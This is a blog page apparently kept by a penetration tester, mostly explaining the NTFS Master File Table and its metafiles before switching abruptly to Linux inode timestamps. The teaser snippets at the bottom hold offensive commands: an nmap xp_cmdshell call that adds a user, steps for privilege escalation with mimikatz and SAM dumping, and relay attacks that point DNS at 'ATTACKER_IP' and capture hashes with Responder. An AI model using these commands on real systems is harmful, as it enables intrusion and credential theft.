Skip to main content

NTFS - MFT

By

Overview of the partition structure.

As well as any other system NTFS divides all useful place into clusters - data blocks used at a time. NTFS supports almost all sizes of clusters - from 512 bytes up to 64 KBytes. The 4 KBytes cluster is considered to be some standard. NTFS doesn't have any anomalies of cluster structure and I have nothing to say about it.
NTFS disk is symbolically divided into two parts. The first 12% of the disk are assigned to so-called MFT area - the space which MFT metafile grows into. Any data recording into this area is impossible. The MFT area is always kept empty not to let the most important service file (MFT) be fragmented at growth. The rest 88% of the disks represent usual space for files storage.

MFT and its structure

MFT is divided into records of the fixed size (usually 1 KBytes), and each record corresponds to some file. The first 16 files are housekeeping and they are inaccessible to the operating system. They are named metafiles and the very first metafile is MFT itself. These first 16 elements MFT are the only part of the disk having the fixed position. It is interesting that the second copy of the first 3 records, for reliability (they are very important) is stored exactly in the middle of the disk. The remaining MFT-file can be stored as well as any other file at any places of the disk. It is possible to re-establish its position with its own help using the basis - the first MFT element.

Metafiles

The first 16 NTFS files (metafiles) are system files. Each of them is responsible for some aspect of system operation. The advantage of such modular approach is in amazing flexibility - for example on FAT the physical failure in the FAT area is fatal for all disk operation. As for NTFS it can displace and even fragment on the disk all system areas avoiding any damage of the surface except the first 16 MFT elements.
The metafiles are in the NTFS disk root directory, they start with a name character "$", though it is difficult to get any information about them by standard means. Curiously that even for these files the quite real size is reported, and it is possible to find out for example how many operating system spends on cataloguing of all your disk having looked at $MFT file size. In the following table the metafiles used at the moment and their function are indicated.
$MFTItself MFT
$MFTmirrcopy of the first 16 MFT records placed in themiddle of the disk
$LogFilejournaling support file (see below)
$Volumehousekeeping information - volume label, file system version, etc.
$AttrDeflist of standard files attributes on the volume
$.root directory
$Bitmapvolume free space bitmap
$Bootboot sector (bootable partition)
$Quotafile where the users rights on disk space usage arerecorded (began to work only in NT5)
$UpcaseFile - the table of accordance between capital andsmall letters in files names on current volume. It isnecessary because in NTFS file names are stored inUnicode that makes 65 thousand various characters and itis not easy to search for their large and smallequivalents.

  • Last modification time: For directories, this is the last time an entry was added, renamed, or removed. For other file types, it's the last time the file was written to.
  • Last access (read) time: For directories, this is the last time it was searched. For other file types, it's the last time the file was read.
  • Last status change: Examples of status changes are change of owner, change of access permission, change of hard link count, or an explicit change of any of the MAC times.
  • Deletion time: ext2 and ext3 record the time a file was deleted in the dtimetimestamp, but not all tools support it.
  • Creation time: ext4fs records the time the file was created in the crtime timestamp, but not all tools support it.
The different timestamps are stored in the metadata contained in the inodes. Inodes are similar to the MFT entry number in the Windows world. One way to read the file metadata on a Linux system is to first 

get the inode number using the command ls -i file 
then use istat against the partition device and specify the inode number. This will show you the different metadata attributes, including the timestamps, the file size, owner's group and user id, permissions, and the blocks that contain the actual data.








Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more